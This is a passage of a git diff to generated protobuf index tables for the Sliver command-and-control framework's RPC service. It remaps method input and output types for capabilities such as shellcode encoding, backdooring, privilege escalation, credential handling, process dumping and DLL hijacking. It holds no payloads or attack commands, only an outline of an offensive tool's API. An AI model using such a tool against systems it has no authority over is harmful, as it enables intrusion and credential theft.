- 213, // 331: rpcpb.SliverRPC.RegistryDeleteKey:output_type -> sliverpb.RegistryDeleteKey
- 214, // 332: rpcpb.SliverRPC.RegistryListSubKeys:output_type -> sliverpb.RegistrySubKeyList
- 215, // 333: rpcpb.SliverRPC.RegistryListValues:output_type -> sliverpb.RegistryValuesList
- 216, // 334: rpcpb.SliverRPC.RegistryReadHive:output_type -> sliverpb.RegistryReadHive
- 217, // 335: rpcpb.SliverRPC.RunSSHCommand:output_type -> sliverpb.SSHCommand
- 218, // 336: rpcpb.SliverRPC.HijackDLL:output_type -> clientpb.DllHijack
- 219, // 337: rpcpb.SliverRPC.GetPrivs:output_type -> sliverpb.GetPrivs
- 220, // 338: rpcpb.SliverRPC.StartRportFwdListener:output_type -> sliverpb.RportFwdListener
- 221, // 339: rpcpb.SliverRPC.GetRportFwdListeners:output_type -> sliverpb.RportFwdListeners
- 220, // 340: rpcpb.SliverRPC.StopRportFwdListener:output_type -> sliverpb.RportFwdListener
- 112, // 341: rpcpb.SliverRPC.OpenSession:output_type -> sliverpb.OpenSession
- 0, // 342: rpcpb.SliverRPC.CloseSession:output_type -> commonpb.Empty
- 222, // 343: rpcpb.SliverRPC.RegisterExtension:output_type -> sliverpb.RegisterExtension
- 223, // 344: rpcpb.SliverRPC.CallExtension:output_type -> sliverpb.CallExtension
- 224, // 345: rpcpb.SliverRPC.ListExtensions:output_type -> sliverpb.ListExtensions
- 225, // 346: rpcpb.SliverRPC.RegisterWasmExtension:output_type -> sliverpb.RegisterWasmExtension
- 226, // 347: rpcpb.SliverRPC.ListWasmExtensions:output_type -> sliverpb.ListWasmExtensions
- 227, // 348: rpcpb.SliverRPC.ExecWasmExtension:output_type -> sliverpb.ExecWasmExtension
- 228, // 349: rpcpb.SliverRPC.WGStartPortForward:output_type -> sliverpb.WGPortForward
- 228, // 350: rpcpb.SliverRPC.WGStopPortForward:output_type -> sliverpb.WGPortForward
- 229, // 351: rpcpb.SliverRPC.WGStartSocks:output_type -> sliverpb.WGSocks
- 229, // 352: rpcpb.SliverRPC.WGStopSocks:output_type -> sliverpb.WGSocks
- 230, // 353: rpcpb.SliverRPC.WGListForwarders:output_type -> sliverpb.WGTCPForwarders
- 231, // 354: rpcpb.SliverRPC.WGListSocksServers:output_type -> sliverpb.WGSocksServers
- 232, // 355: rpcpb.SliverRPC.Shell:output_type -> sliverpb.Shell
- 233, // 356: rpcpb.SliverRPC.Portfwd:output_type -> sliverpb.Portfwd
- 128, // 357: rpcpb.SliverRPC.CreateSocks:output_type -> sliverpb.Socks
- 0, // 358: rpcpb.SliverRPC.CloseSocks:output_type -> commonpb.Empty
- 129, // 359: rpcpb.SliverRPC.SocksProxy:output_type -> sliverpb.SocksData
- 130, // 360: rpcpb.SliverRPC.CreateTunnel:output_type -> sliverpb.Tunnel
- 0, // 361: rpcpb.SliverRPC.CloseTunnel:output_type -> commonpb.Empty
- 131, // 362: rpcpb.SliverRPC.TunnelData:output_type -> sliverpb.TunnelData
- 30, // 363: rpcpb.SliverRPC.Events:output_type -> clientpb.Event
- 182, // [182:364] is the sub-list for method output_type
- 0, // [0:182] is the sub-list for method input_type
+ 40, // 79: rpcpb.SliverRPC.ShellcodeRDI:input_type -> clientpb.ShellcodeRDIReq
+ 0, // 80: rpcpb.SliverRPC.GetCompiler:input_type -> commonpb.Empty
+ 41, // 81: rpcpb.SliverRPC.ShellcodeEncoder:input_type -> clientpb.ShellcodeEncodeReq
+ 0, // 82: rpcpb.SliverRPC.ShellcodeEncoderMap:input_type -> commonpb.Empty
+ 0, // 83: rpcpb.SliverRPC.TrafficEncoderMap:input_type -> commonpb.Empty
+ 42, // 84: rpcpb.SliverRPC.TrafficEncoderAdd:input_type -> clientpb.TrafficEncoder
+ 42, // 85: rpcpb.SliverRPC.TrafficEncoderRm:input_type -> clientpb.TrafficEncoder
+ 0, // 86: rpcpb.SliverRPC.Websites:input_type -> commonpb.Empty
+ 43, // 87: rpcpb.SliverRPC.Website:input_type -> clientpb.Website
+ 43, // 88: rpcpb.SliverRPC.WebsiteRemove:input_type -> clientpb.Website
+ 44, // 89: rpcpb.SliverRPC.WebsiteAddContent:input_type -> clientpb.WebsiteAddContent
+ 44, // 90: rpcpb.SliverRPC.WebsiteUpdateContent:input_type -> clientpb.WebsiteAddContent
+ 45, // 91: rpcpb.SliverRPC.WebsiteRemoveContent:input_type -> clientpb.WebsiteRemoveContent
+ 46, // 92: rpcpb.SliverRPC.Ping:input_type -> sliverpb.Ping
+ 47, // 93: rpcpb.SliverRPC.Ps:input_type -> sliverpb.PsReq
+ 48, // 94: rpcpb.SliverRPC.Terminate:input_type -> sliverpb.TerminateReq
+ 49, // 95: rpcpb.SliverRPC.Ifconfig:input_type -> sliverpb.IfconfigReq
+ 50, // 96: rpcpb.SliverRPC.Netstat:input_type -> sliverpb.NetstatReq
+ 51, // 97: rpcpb.SliverRPC.Ls:input_type -> sliverpb.LsReq
+ 52, // 98: rpcpb.SliverRPC.Cd:input_type -> sliverpb.CdReq
+ 53, // 99: rpcpb.SliverRPC.Pwd:input_type -> sliverpb.PwdReq
+ 54, // 100: rpcpb.SliverRPC.Mv:input_type -> sliverpb.MvReq
+ 55, // 101: rpcpb.SliverRPC.Cp:input_type -> sliverpb.CpReq
+ 56, // 102: rpcpb.SliverRPC.Rm:input_type -> sliverpb.RmReq
+ 57, // 103: rpcpb.SliverRPC.Mkdir:input_type -> sliverpb.MkdirReq
+ 58, // 104: rpcpb.SliverRPC.Download:input_type -> sliverpb.DownloadReq
+ 59, // 105: rpcpb.SliverRPC.Upload:input_type -> sliverpb.UploadReq
+ 60, // 106: rpcpb.SliverRPC.Grep:input_type -> sliverpb.GrepReq
+ 61, // 107: rpcpb.SliverRPC.Chmod:input_type -> sliverpb.ChmodReq
+ 62, // 108: rpcpb.SliverRPC.Chown:input_type -> sliverpb.ChownReq
+ 63, // 109: rpcpb.SliverRPC.Chtimes:input_type -> sliverpb.ChtimesReq
+ 64, // 110: rpcpb.SliverRPC.MemfilesList:input_type -> sliverpb.MemfilesListReq
+ 65, // 111: rpcpb.SliverRPC.MemfilesAdd:input_type -> sliverpb.MemfilesAddReq
+ 66, // 112: rpcpb.SliverRPC.MemfilesRm:input_type -> sliverpb.MemfilesRmReq
+ 67, // 113: rpcpb.SliverRPC.Mount:input_type -> sliverpb.MountReq
+ 68, // 114: rpcpb.SliverRPC.ProcessDump:input_type -> sliverpb.ProcessDumpReq
+ 69, // 115: rpcpb.SliverRPC.RunAs:input_type -> sliverpb.RunAsReq
+ 70, // 116: rpcpb.SliverRPC.Impersonate:input_type -> sliverpb.ImpersonateReq
+ 71, // 117: rpcpb.SliverRPC.RevToSelf:input_type -> sliverpb.RevToSelfReq
+ 72, // 118: rpcpb.SliverRPC.GetSystem:input_type -> clientpb.GetSystemReq
+ 73, // 119: rpcpb.SliverRPC.Task:input_type -> sliverpb.TaskReq
+ 74, // 120: rpcpb.SliverRPC.Msf:input_type -> clientpb.MSFReq
+ 75, // 121: rpcpb.SliverRPC.MsfRemote:input_type -> clientpb.MSFRemoteReq
+ 76, // 122: rpcpb.SliverRPC.ExecuteAssembly:input_type -> sliverpb.ExecuteAssemblyReq
+ 77, // 123: rpcpb.SliverRPC.Migrate:input_type -> clientpb.MigrateReq
+ 78, // 124: rpcpb.SliverRPC.Execute:input_type -> sliverpb.ExecuteReq
+ 79, // 125: rpcpb.SliverRPC.ExecuteWindows:input_type -> sliverpb.ExecuteWindowsReq
+ 80, // 126: rpcpb.SliverRPC.Sideload:input_type -> sliverpb.SideloadReq
+ 81, // 127: rpcpb.SliverRPC.SpawnDll:input_type -> sliverpb.InvokeSpawnDllReq
+ 82, // 128: rpcpb.SliverRPC.Screenshot:input_type -> sliverpb.ScreenshotReq
+ 83, // 129: rpcpb.SliverRPC.CurrentTokenOwner:input_type -> sliverpb.CurrentTokenOwnerReq
+ 84, // 130: rpcpb.SliverRPC.Services:input_type -> sliverpb.ServicesReq
+ 85, // 131: rpcpb.SliverRPC.ServiceDetail:input_type -> sliverpb.ServiceDetailReq
+ 86, // 132: rpcpb.SliverRPC.StartServiceByName:input_type -> sliverpb.StartServiceByNameReq
+ 87, // 133: rpcpb.SliverRPC.PivotStartListener:input_type -> sliverpb.PivotStartListenerReq
+ 88, // 134: rpcpb.SliverRPC.PivotStopListener:input_type -> sliverpb.PivotStopListenerReq
+ 89, // 135: rpcpb.SliverRPC.PivotSessionListeners:input_type -> sliverpb.PivotListenersReq
+ 0, // 136: rpcpb.SliverRPC.PivotGraph:input_type -> commonpb.Empty
+ 90, // 137: rpcpb.SliverRPC.StartService:input_type -> sliverpb.StartServiceReq
+ 91, // 138: rpcpb.SliverRPC.StopService:input_type -> sliverpb.StopServiceReq
+ 92, // 139: rpcpb.SliverRPC.RemoveService:input_type -> sliverpb.RemoveServiceReq
+ 93, // 140: rpcpb.SliverRPC.MakeToken:input_type -> sliverpb.MakeTokenReq
+ 94, // 141: rpcpb.SliverRPC.GetEnv:input_type -> sliverpb.EnvReq
+ 95, // 142: rpcpb.SliverRPC.SetEnv:input_type -> sliverpb.SetEnvReq
+ 96, // 143: rpcpb.SliverRPC.UnsetEnv:input_type -> sliverpb.UnsetEnvReq
+ 97, // 144: rpcpb.SliverRPC.Backdoor:input_type -> clientpb.BackdoorReq
+ 98, // 145: rpcpb.SliverRPC.RegistryRead:input_type -> sliverpb.RegistryReadReq
+ 99, // 146: rpcpb.SliverRPC.RegistryWrite:input_type -> sliverpb.RegistryWriteReq
+ 100, // 147: rpcpb.SliverRPC.RegistryCreateKey:input_type -> sliverpb.RegistryCreateKeyReq
+ 101, // 148: rpcpb.SliverRPC.RegistryDeleteKey:input_type -> sliverpb.RegistryDeleteKeyReq
+ 102, // 149: rpcpb.SliverRPC.RegistryListSubKeys:input_type -> sliverpb.RegistrySubKeyListReq
+ 103, // 150: rpcpb.SliverRPC.RegistryListValues:input_type -> sliverpb.RegistryListValuesReq
+ 104, // 151: rpcpb.SliverRPC.RegistryReadHive:input_type -> sliverpb.RegistryReadHiveReq
+ 105, // 152: rpcpb.SliverRPC.RunSSHCommand:input_type -> sliverpb.SSHCommandReq
+ 106, // 153: rpcpb.SliverRPC.HijackDLL:input_type -> clientpb.DllHijackReq
+ 107, // 154: rpcpb.SliverRPC.GetPrivs:input_type -> sliverpb.GetPrivsReq
+ 108, // 155: rpcpb.SliverRPC.StartRportFwdListener:input_type -> sliverpb.RportFwdStartListenerReq
+ 109, // 156: rpcpb.SliverRPC.GetRportFwdListeners:input_type -> sliverpb.RportFwdListenersReq
+ 110, // 157: rpcpb.SliverRPC.StopRportFwdListener:input_type -> sliverpb.RportFwdStopListenerReq
+ 111, // 158: rpcpb.SliverRPC.OpenSession:input_type -> sliverpb.OpenSession
+ 112, // 159: rpcpb.SliverRPC.CloseSession:input_type -> sliverpb.CloseSession
+ 113, // 160: rpcpb.SliverRPC.RegisterExtension:input_type -> sliverpb.RegisterExtensionReq
+ 114, // 161: rpcpb.SliverRPC.CallExtension:input_type -> sliverpb.CallExtensionReq
+ 115, // 162: rpcpb.SliverRPC.ListExtensions:input_type -> sliverpb.ListExtensionsReq
+ 116, // 163: rpcpb.SliverRPC.RegisterWasmExtension:input_type -> sliverpb.RegisterWasmExtensionReq
+ 117, // 164: rpcpb.SliverRPC.ListWasmExtensions:input_type -> sliverpb.ListWasmExtensionsReq
+ 118, // 165: rpcpb.SliverRPC.ExecWasmExtension:input_type -> sliverpb.ExecWasmExtensionReq
+ 119, // 166: rpcpb.SliverRPC.WGStartPortForward:input_type -> sliverpb.WGPortForwardStartReq
+ 120, // 167: rpcpb.SliverRPC.WGStopPortForward:input_type -> sliverpb.WGPortForwardStopReq
+ 121, // 168: rpcpb.SliverRPC.WGStartSocks:input_type -> sliverpb.WGSocksStartReq
+ 122, // 169: rpcpb.SliverRPC.WGStopSocks:input_type -> sliverpb.WGSocksStopReq
+ 123, // 170: rpcpb.SliverRPC.WGListForwarders:input_type -> sliverpb.WGTCPForwardersReq
+ 124, // 171: rpcpb.SliverRPC.WGListSocksServers:input_type -> sliverpb.WGSocksServersReq
+ 125, // 172: rpcpb.SliverRPC.Shell:input_type -> sliverpb.ShellReq
+ 126, // 173: rpcpb.SliverRPC.Portfwd:input_type -> sliverpb.PortfwdReq
+ 127, // 174: rpcpb.SliverRPC.CreateSocks:input_type -> sliverpb.Socks
+ 127, // 175: rpcpb.SliverRPC.CloseSocks:input_type -> sliverpb.Socks
+ 128, // 176: rpcpb.SliverRPC.SocksProxy:input_type -> sliverpb.SocksData
+ 129, // 177: rpcpb.SliverRPC.CreateTunnel:input_type -> sliverpb.Tunnel
+ 129, // 178: rpcpb.SliverRPC.CloseTunnel:input_type -> sliverpb.Tunnel
+ 130, // 179: rpcpb.SliverRPC.TunnelData:input_type -> sliverpb.TunnelData
+ 0, // 180: rpcpb.SliverRPC.Events:input_type -> commonpb.Empty
+ 131, // 181: rpcpb.SliverRPC.GetVersion:output_type -> clientpb.Version
+ 0, // 182: rpcpb.SliverRPC.ClientLog:output_type -> commonpb.Empty
+ 132, // 183: rpcpb.SliverRPC.GetOperators:output_type -> clientpb.Operators
+ 0, // 184: rpcpb.SliverRPC.Kill:output_type -> commonpb.Empty
+ 133, // 185: rpcpb.SliverRPC.Reconfigure:output_type -> sliverpb.Reconfigure
+ 0, // 186: rpcpb.SliverRPC.Rename:output_type -> commonpb.Empty
+ 134, // 187: rpcpb.SliverRPC.GetSessions:output_type -> clientpb.Sessions
+ 135, // 188: rpcpb.SliverRPC.MonitorStart:output_type -> commonpb.Response
+ 0, // 189: rpcpb.SliverRPC.MonitorStop:output_type -> commonpb.Empty
+ 136, // 190: rpcpb.SliverRPC.MonitorListConfig:output_type -> clientpb.MonitoringProviders
+ 135, // 191: rpcpb.SliverRPC.MonitorAddConfig:output_type -> commonpb.Response
+ 135, // 192: rpcpb.SliverRPC.MonitorDelConfig:output_type -> commonpb.Response
+ 137, // 193: rpcpb.SliverRPC.StartMTLSListener:output_type -> clientpb.ListenerJob
+ 137, // 194: rpcpb.SliverRPC.StartWGListener:output_type -> clientpb.ListenerJob
+ 137, // 195: rpcpb.SliverRPC.StartDNSListener:output_type -> clientpb.ListenerJob
+ 137, // 196: rpcpb.SliverRPC.StartHTTPSListener:output_type -> clientpb.ListenerJob
+ 137, // 197: rpcpb.SliverRPC.StartHTTPListener:output_type -> clientpb.ListenerJob
+ 138, // 198: rpcpb.SliverRPC.GetBeacons:output_type -> clientpb.Beacons
+ 10, // 199: rpcpb.SliverRPC.GetBeacon:output_type -> clientpb.Beacon
+ 0, // 200: rpcpb.SliverRPC.RmBeacon:output_type -> commonpb.Empty
+ 139, // 201: rpcpb.SliverRPC.GetBeaconTasks:output_type -> clientpb.BeaconTasks
+ 11, // 202: rpcpb.SliverRPC.GetBeaconTaskContent:output_type -> clientpb.BeaconTask
+ 11, // 203: rpcpb.SliverRPC.CancelBeaconTask:output_type -> clientpb.BeaconTask
+ 0, // 204: rpcpb.SliverRPC.UpdateBeaconIntegrityInformation:output_type -> commonpb.Empty
+ 140, // 205: rpcpb.SliverRPC.GetJobs:output_type -> clientpb.Jobs
+ 141, // 206: rpcpb.SliverRPC.KillJob:output_type -> clientpb.KillJob
+ 0, // 207: rpcpb.SliverRPC.RestartJobs:output_type -> commonpb.Empty
+ 142, // 208: rpcpb.SliverRPC.StartTCPStagerListener:output_type -> clientpb.StagerListener
+ 16, // 209: rpcpb.SliverRPC.LootAdd:output_type -> clientpb.Loot
+ 0, // 210: rpcpb.SliverRPC.LootRm:output_type -> commonpb.Empty
+ 16, // 211: rpcpb.SliverRPC.LootUpdate:output_type -> clientpb.Loot
+ 16, // 212: rpcpb.SliverRPC.LootContent:output_type -> clientpb.Loot
+ 143, // 213: rpcpb.SliverRPC.LootAll:output_type -> clientpb.AllLoot
+ 17, // 214: rpcpb.SliverRPC.Creds:output_type -> clientpb.Credentials
+ 0, // 215: rpcpb.SliverRPC.CredsAdd:output_type -> commonpb.Empty
+ 0, // 216: rpcpb.SliverRPC.CredsRm:output_type -> commonpb.Empty
+ 0, // 217: rpcpb.SliverRPC.CredsUpdate:output_type -> commonpb.Empty
+ 18, // 218: rpcpb.SliverRPC.GetCredByID:output_type -> clientpb.Credential
+ 17, // 219: rpcpb.SliverRPC.GetCredsByHashType:output_type -> clientpb.Credentials
+ 17, // 220: rpcpb.SliverRPC.GetPlaintextCredsByHashType:output_type -> clientpb.Credentials
+ 18, // 221: rpcpb.SliverRPC.CredsSniffHashType:output_type -> clientpb.Credential
+ 144, // 222: rpcpb.SliverRPC.Hosts:output_type -> clientpb.AllHosts
+ 19, // 223: rpcpb.SliverRPC.Host:output_type -> clientpb.Host
+ 0, // 224: rpcpb.SliverRPC.HostRm:output_type -> commonpb.Empty
+ 0, // 225: rpcpb.SliverRPC.HostIOCRm:output_type -> commonpb.Empty
+ 145, // 226: rpcpb.SliverRPC.Generate:output_type -> clientpb.Generate
+ 146, // 227: rpcpb.SliverRPC.GenerateExternal:output_type -> clientpb.ExternalImplantConfig
+ 0, // 228: rpcpb.SliverRPC.GenerateExternalSaveBuild:output_type -> commonpb.Empty
+ 146, // 229: rpcpb.SliverRPC.GenerateExternalGetBuildConfig:output_type -> clientpb.ExternalImplantConfig
+ 145, // 230: rpcpb.SliverRPC.GenerateStage:output_type -> clientpb.Generate
+ 0, // 231: rpcpb.SliverRPC.StageImplantBuild:output_type -> commonpb.Empty
+ 147, // 232: rpcpb.SliverRPC.GetHTTPC2Profiles:output_type -> clientpb.HTTPC2Configs
+ 148, // 233: rpcpb.SliverRPC.GetHTTPC2ProfileByName:output_type -> clientpb.HTTPC2Config
+ 0, // 234: rpcpb.SliverRPC.SaveHTTPC2Profile:output_type -> commonpb.Empty
+ 30, // 235: rpcpb.SliverRPC.BuilderRegister:output_type -> clientpb.Event
+ 0, // 236: rpcpb.SliverRPC.BuilderTrigger:output_type -> commonpb.Empty
+ 149, // 237: rpcpb.SliverRPC.Builders:output_type -> clientpb.Builders
+ 150, // 238: rpcpb.SliverRPC.GetCertificateInfo:output_type -> clientpb.CertificateInfo
+ 30, // 239: rpcpb.SliverRPC.CrackstationRegister:output_type -> clientpb.Event
+ 0, // 240: rpcpb.SliverRPC.CrackstationTrigger:output_type -> commonpb.Empty
+ 0, // 241: rpcpb.SliverRPC.CrackstationBenchmark:output_type -> commonpb.Empty
+ 151, // 242: rpcpb.SliverRPC.Crackstations:output_type -> clientpb.Crackstations
+ 34, // 243: rpcpb.SliverRPC.CrackTaskByID:output_type -> clientpb.CrackTask
+ 0, // 244: rpcpb.SliverRPC.CrackTaskUpdate:output_type -> commonpb.Empty
+ 152, // 245: rpcpb.SliverRPC.CrackFilesList:output_type -> clientpb.CrackFiles
+ 35, // 246: rpcpb.SliverRPC.CrackFileCreate:output_type -> clientpb.CrackFile
+ 0, // 247: rpcpb.SliverRPC.CrackFileChunkUpload:output_type -> commonpb.Empty
+ 36, // 248: rpcpb.SliverRPC.CrackFileChunkDownload:output_type -> clientpb.CrackFileChunk
+ 0, // 249: rpcpb.SliverRPC.CrackFileComplete:output_type -> commonpb.Empty
+ 0, // 250: rpcpb.SliverRPC.CrackFileDelete:output_type -> commonpb.Empty
+ 145, // 251: rpcpb.SliverRPC.Regenerate:output_type -> clientpb.Generate
+ 153, // 252: rpcpb.SliverRPC.ImplantBuilds:output_type -> clientpb.ImplantBuilds
+ 0, // 253: rpcpb.SliverRPC.DeleteImplantBuild:output_type -> commonpb.Empty
+ 154, // 254: rpcpb.SliverRPC.Canaries:output_type -> clientpb.Canaries
+ 155, // 255: rpcpb.SliverRPC.GenerateWGClientConfig:output_type -> clientpb.WGClientConfig
+ 156, // 256: rpcpb.SliverRPC.GenerateUniqueIP:output_type -> clientpb.UniqueWGIP
+ 157, // 257: rpcpb.SliverRPC.ImplantProfiles:output_type -> clientpb.ImplantProfiles
+ 0, // 258: rpcpb.SliverRPC.DeleteImplantProfile:output_type -> commonpb.Empty
+ 39, // 259: rpcpb.SliverRPC.SaveImplantProfile:output_type -> clientpb.ImplantProfile
+ 158, // 260: rpcpb.SliverRPC.ShellcodeRDI:output_type -> clientpb.ShellcodeRDI
+ 159, // 261: rpcpb.SliverRPC.GetCompiler:output_type -> clientpb.Compiler
+ 160, // 262: rpcpb.SliverRPC.ShellcodeEncoder:output_type -> clientpb.ShellcodeEncode
+ 161, // 263: rpcpb.SliverRPC.ShellcodeEncoderMap:output_type -> clientpb.ShellcodeEncoderMap
+ 162, // 264: rpcpb.SliverRPC.TrafficEncoderMap:output_type -> clientpb.TrafficEncoderMap
+ 163, // 265: rpcpb.SliverRPC.TrafficEncoderAdd:output_type -> clientpb.TrafficEncoderTests
+ 0, // 266: rpcpb.SliverRPC.TrafficEncoderRm:output_type -> commonpb.Empty
+ 164, // 267: rpcpb.SliverRPC.Websites:output_type -> clientpb.Websites
+ 43, // 268: rpcpb.SliverRPC.Website:output_type -> clientpb.Website
+ 0, // 269: rpcpb.SliverRPC.WebsiteRemove:output_type -> commonpb.Empty
+ 43, // 270: rpcpb.SliverRPC.WebsiteAddContent:output_type -> clientpb.Website
+ 43, // 271: rpcpb.SliverRPC.WebsiteUpdateContent:output_type -> clientpb.Website
+ 43, // 272: rpcpb.SliverRPC.WebsiteRemoveContent:output_type -> clientpb.Website
+ 46, // 273: rpcpb.SliverRPC.Ping:output_type -> sliverpb.Ping
+ 165, // 274: rpcpb.SliverRPC.Ps:output_type -> sliverpb.Ps
+ 166, // 275: rpcpb.SliverRPC.Terminate:output_type -> sliverpb.Terminate
+ 167, // 276: rpcpb.SliverRPC.Ifconfig:output_type -> sliverpb.Ifconfig
+ 168, // 277: rpcpb.SliverRPC.Netstat:output_type -> sliverpb.Netstat
+ 169, // 278: rpcpb.SliverRPC.Ls:output_type -> sliverpb.Ls
+ 170, // 279: rpcpb.SliverRPC.Cd:output_type -> sliverpb.Pwd
+ 170, // 280: rpcpb.SliverRPC.Pwd:output_type -> sliverpb.Pwd
+ 171, // 281: rpcpb.SliverRPC.Mv:output_type -> sliverpb.Mv
+ 172, // 282: rpcpb.SliverRPC.Cp:output_type -> sliverpb.Cp
+ 173, // 283: rpcpb.SliverRPC.Rm:output_type -> sliverpb.Rm
+ 174, // 284: rpcpb.SliverRPC.Mkdir:output_type -> sliverpb.Mkdir
+ 175, // 285: rpcpb.SliverRPC.Download:output_type -> sliverpb.Download
+ 176, // 286: rpcpb.SliverRPC.Upload:output_type -> sliverpb.Upload
+ 177, // 287: rpcpb.SliverRPC.Grep:output_type -> sliverpb.Grep
+ 178, // 288: rpcpb.SliverRPC.Chmod:output_type -> sliverpb.Chmod
+ 179, // 289: rpcpb.SliverRPC.Chown:output_type -> sliverpb.Chown
+ 180, // 290: rpcpb.SliverRPC.Chtimes:output_type -> sliverpb.Chtimes
+ 169, // 291: rpcpb.SliverRPC.MemfilesList:output_type -> sliverpb.Ls
+ 181, // 292: rpcpb.SliverRPC.MemfilesAdd:output_type -> sliverpb.MemfilesAdd
+ 182, // 293: rpcpb.SliverRPC.MemfilesRm:output_type -> sliverpb.MemfilesRm
+ 183, // 294: rpcpb.SliverRPC.Mount:output_type -> sliverpb.Mount
+ 184, // 295: rpcpb.SliverRPC.ProcessDump:output_type -> sliverpb.ProcessDump
+ 185, // 296: rpcpb.SliverRPC.RunAs:output_type -> sliverpb.RunAs
+ 186, // 297: rpcpb.SliverRPC.Impersonate:output_type -> sliverpb.Impersonate
+ 187, // 298: rpcpb.SliverRPC.RevToSelf:output_type -> sliverpb.RevToSelf
+ 188, // 299: rpcpb.SliverRPC.GetSystem:output_type -> sliverpb.GetSystem
+ 189, // 300: rpcpb.SliverRPC.Task:output_type -> sliverpb.Task
+ 189, // 301: rpcpb.SliverRPC.Msf:output_type -> sliverpb.Task
+ 189, // 302: rpcpb.SliverRPC.MsfRemote:output_type -> sliverpb.Task
+ 190, // 303: rpcpb.SliverRPC.ExecuteAssembly:output_type -> sliverpb.ExecuteAssembly
+ 191, // 304: rpcpb.SliverRPC.Migrate:output_type -> sliverpb.Migrate
+ 192, // 305: rpcpb.SliverRPC.Execute:output_type -> sliverpb.Execute
+ 192, // 306: rpcpb.SliverRPC.ExecuteWindows:output_type -> sliverpb.Execute
+ 193, // 307: rpcpb.SliverRPC.Sideload:output_type -> sliverpb.Sideload
+ 194, // 308: rpcpb.SliverRPC.SpawnDll:output_type -> sliverpb.SpawnDll
+ 195, // 309: rpcpb.SliverRPC.Screenshot:output_type -> sliverpb.Screenshot
+ 196, // 310: rpcpb.SliverRPC.CurrentTokenOwner:output_type -> sliverpb.CurrentTokenOwner
+ 197, // 311: rpcpb.SliverRPC.Services:output_type -> sliverpb.Services
+ 198, // 312: rpcpb.SliverRPC.ServiceDetail:output_type -> sliverpb.ServiceDetail
+ 199, // 313: rpcpb.SliverRPC.StartServiceByName:output_type -> sliverpb.ServiceInfo
+ 200, // 314: rpcpb.SliverRPC.PivotStartListener:output_type -> sliverpb.PivotListener
+ 0, // 315: rpcpb.SliverRPC.PivotStopListener:output_type -> commonpb.Empty
+ 201, // 316: rpcpb.SliverRPC.PivotSessionListeners:output_type -> sliverpb.PivotListeners
+ 202, // 317: rpcpb.SliverRPC.PivotGraph:output_type -> clientpb.PivotGraph
+ 199, // 318: rpcpb.SliverRPC.StartService:output_type -> sliverpb.ServiceInfo
+ 199, // 319: rpcpb.SliverRPC.StopService:output_type -> sliverpb.ServiceInfo
+ 199, // 320: rpcpb.SliverRPC.RemoveService:output_type -> sliverpb.ServiceInfo
+ 203, // 321: rpcpb.SliverRPC.MakeToken:output_type -> sliverpb.MakeToken
+ 204, // 322: rpcpb.SliverRPC.GetEnv:output_type -> sliverpb.EnvInfo
+ 205, // 323: rpcpb.SliverRPC.SetEnv:output_type -> sliverpb.SetEnv
+ 206, // 324: rpcpb.SliverRPC.UnsetEnv:output_type -> sliverpb.UnsetEnv
+ 207, // 325: rpcpb.SliverRPC.Backdoor:output_type -> clientpb.Backdoor
+ 208, // 326: rpcpb.SliverRPC.RegistryRead:output_type -> sliverpb.RegistryRead
+ 209, // 327: rpcpb.SliverRPC.RegistryWrite:output_type -> sliverpb.RegistryWrite
+ 210, // 328: rpcpb.SliverRPC.RegistryCreateKey:output_type -> sliverpb.RegistryCreateKey
+ 211, // 329: rpcpb.SliverRPC.RegistryDeleteKey:output_type -> sliverpb.RegistryDeleteKey
+ 212, // 330: rpcpb.SliverRPC.RegistryListSubKeys:output_type -> sliverpb.RegistrySubKeyList
+ 213, // 331: rpcpb.SliverRPC.RegistryListValues:output_type -> sliverpb.RegistryValuesList
+ 214, // 332: rpcpb.SliverRPC.RegistryReadHive:output_type -> sliverpb.RegistryReadHive
+ 215, // 333: rpcpb.SliverRPC.RunSSHCommand:output_type -> sliverpb.SSHCommand
+ 216, // 334: rpcpb.SliverRPC.HijackDLL:output_type -> clientpb.DllHijack
+ 217, // 335: rpcpb.SliverRPC.GetPrivs:output_type -> sliverpb.GetPrivs
+ 218, // 336: rpcpb.SliverRPC.StartRportFwdListener:output_type -> sliverpb.RportFwdListener
+ 219, // 337: rpcpb.SliverRPC.GetRportFwdListeners:output_type -> sliverpb.RportFwdListeners
+ 218, // 338: rpcpb.SliverRPC.StopRportFwdListener:output_type -> sliverpb.RportFwdListener
+ 111, // 339: rpcpb.SliverRPC.OpenSession:output_type -> sliverpb.OpenSession
+ 0, // 340: rpcpb.SliverRPC.CloseSession:output_type -> commonpb.Empty
+ 220, // 341: rpcpb.SliverRPC.RegisterExtension:output_type -> sliverpb.RegisterExtension
+ 221, // 342: rpcpb.SliverRPC.CallExtension:output_type -> sliverpb.CallExtension
+ 222, // 343: rpcpb.SliverRPC.ListExtensions:output_type -> sliverpb.ListExtensions
+ 223, // 344: rpcpb.SliverRPC.RegisterWasmExtension:output_type -> sliverpb.RegisterWasmExtension
+ 224, // 345: rpcpb.SliverRPC.ListWasmExtensions:output_type -> sliverpb.ListWasmExtensions
+ 225, // 346: rpcpb.SliverRPC.ExecWasmExtension:output_type -> sliverpb.ExecWasmExtension
+ 226, // 347: rpcpb.SliverRPC.WGStartPortForward:output_type -> sliverpb.WGPortForward
+ 226, // 348: rpcpb.SliverRPC.WGStopPortForward:output_type -> sliverpb.WGPortForward
+ 227, // 349: rpcpb.SliverRPC.WGStartSocks:output_type -> sliverpb.WGSocks
+ 227, // 350: rpcpb.SliverRPC.WGStopSocks:output_type -> sliverpb.WGSocks
+ 228, // 351: rpcpb.SliverRPC.WGListForwarders:output_type -> sliverpb.WGTCPForwarders
+ 229, // 352: rpcpb.SliverRPC.WGListSocksServers:output_type -> sliverpb.WGSocksServers
+ 230, // 353: rpcpb.SliverRPC.Shell:output_type -> sliverpb.Shell
+ 231, // 354: rpcpb.SliverRPC.Portfwd:output_type -> sliverpb.Portfwd
+ 127, // 355: rpcpb.SliverRPC.CreateSocks:output_type -> sliverpb.Socks
+ 0, // 356: rpcpb.SliverRPC.CloseSocks:output_type -> commonpb.Empty
+ 128, // 357: rpcpb.SliverRPC.SocksProxy:output_type -> sliverpb.SocksData
+ 129, // 358: rpcpb.SliverRPC.CreateTunnel:output_type -> sliverpb.Tunnel
+ 0, // 359: rpcpb.SliverRPC.CloseTunnel:output_type -> commonpb.Empty
+ 130, // 360: rpcpb.SliverRPC.TunnelData:output_type -> sliverpb.TunnelData
+ 30, // 361: rpcpb.SliverRPC.Events:output_type -> clientpb.Event
+ 181, // [181:362] is the sub-list for method output_type
+ 0, // [0:181] is the sub-list for method input_type
0, // [0:0] is the sub-list for extension type_name
0, // [0:0] is the sub-list for extension extendee
0, // [0:0] is the sub-list for field type_name
diff --git a/protobuf/rpcpb/services.proto b/protobuf/rpcpb/services.proto
